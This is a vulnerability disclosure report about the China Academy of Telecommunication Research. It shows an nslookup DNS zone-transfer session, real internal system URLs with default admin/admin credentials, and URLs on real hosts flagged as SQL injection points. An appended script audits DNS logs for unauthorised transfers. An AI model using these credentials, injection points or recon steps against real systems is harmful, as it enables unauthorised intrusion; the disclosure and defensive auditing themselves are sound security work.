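2014-04-16: Details reported to the vendor; awaiting vendor response
2014-04-21: Vendor confirmed; details disclosed to the vendor only
2014-05-01: Details disclosed to core white hats and experts in related fields
2014-05-11: Details disclosed to regular white hats
2014-05-21: Details disclosed to intern white hats
2014-05-31: Details disclosed to the public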
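What a single DNS zone transfer vulnerability led to....
First, I found that the DNS of the MIIT's China Academy of Telecommunication Research allows zone transfers~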
C:\Users\LeLe's>nslookup
默认服务器: X
Address: X

> set type=ns
> catr.cn
服务器: X
Address: X

非权威应答:
catr.cn nameserver = dns.cci.cn.net
catr.cn nameserver = dns.catr.com.cn
dns.cci.cn.net internet address = 219.239.97.125
dns.catr.com.cn internet address = 114.242.138.121
> server dns.catr.com.cn
默认服务器: dns.catr.com.cn
Address: 114.242.138.121

> ls catr.cn
[dns.catr.com.cn]
[full zone listing for catr.cn returned here]
Then I tested them one by one....
Data monitoring system http://db.catr.cn/mainpage.aspx admin admin
Project bidding information platform http://xmldata.catr.cn/indexReal.jsp admin admin
SQL injection
http://www.chinattl.com/ttlweb/display_A.aspx?id=2328
http://219.239.97.36/cn/showclass.asp?classid=187
http://219.239.97.36/cn/showclass.asp?classid=39
http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847'
PowerEasy 错误 '800a000d'
Type mismatch
/chinacc/ShowArticle.asp,行3
I won't post a screenshot for each one.... What I found is only a small part, very superficial stuff....
...........I don't know how
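Severity: High
Vulnerability Rank: 20
Confirmed at: 2014-04-21 09:00
CNVD confirmed and reproduced the six vulnerabilities described, and passed the case to CNCERT to notify the responsible department of the Ministry of Industry and Information Technology through the ministry's internal contact channel.
None yet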
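A defender-side check for the zone transfer exposure shown in the nslookup session above, added here as an example and not part of the original report: it scans name-server logs for zone transfers that were served to, or refused for, clients that are not known secondaries. The BIND 9 log wording, the function name `audit_transfers` and the sample log lines are assumptions; the report does not say which DNS software was in use.

```python
import ipaddress
import re

# Assumed BIND 9 xfer-out / security log wording; other servers log differently.
XFER_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+.*?"
    r"(?:transfer of '(?P<ok>[^'/]+)/IN': (?:AXFR|IXFR) started"
    r"|zone transfer '(?P<denied>[^'/]+)/(?:AXFR|IXFR)/IN' denied)"
)

# Constructed sample lines (documentation address ranges), not taken from the page.
SAMPLE_LOG = """\
21-Apr-2014 09:00:01.120 xfer-out: info: client 192.0.2.53#40112 (example.cn): transfer of 'example.cn/IN': AXFR started
21-Apr-2014 09:03:44.871 xfer-out: info: client 203.0.113.77#51790 (example.cn): transfer of 'example.cn/IN': AXFR started
21-Apr-2014 09:04:10.002 security: error: client 198.51.100.9#33021 (example.cn): zone transfer 'example.cn/AXFR/IN' denied
21-Apr-2014 09:05:00.500 queries: info: client 203.0.113.77#51791 (www.example.cn): query: www.example.cn IN A +
"""


def audit_transfers(log_text, secondaries):
    """Return (served, denied): lists of (client_ip, zone) for clients outside `secondaries`."""
    allowed = [ipaddress.ip_network(n) for n in secondaries]
    served, denied = [], []
    for line in log_text.splitlines():
        m = XFER_RE.search(line)
        if not m:
            continue  # ordinary query or unrelated log line
        ip = ipaddress.ip_address(m.group("ip"))
        if any(ip in net for net in allowed):
            continue  # expected transfer to a known secondary
        if m.group("ok"):
            served.append((str(ip), m.group("ok")))      # zone was handed out: exposure
        else:
            denied.append((str(ip), m.group("denied")))  # ACL held: attempt only
    return served, denied


if __name__ == "__main__":
    served, denied = audit_transfers(SAMPLE_LOG, ["192.0.2.53/32"])
    for ip, zone in served:
        print(f"EXPOSED: {zone} transferred to unlisted client {ip}")
    for ip, zone in denied:
        print(f"refused: {zone} transfer attempt from {ip}")
```

Any entry in the served list means the transfer ACL is missing or too broad for that zone; entries in the denied list show the ACL working.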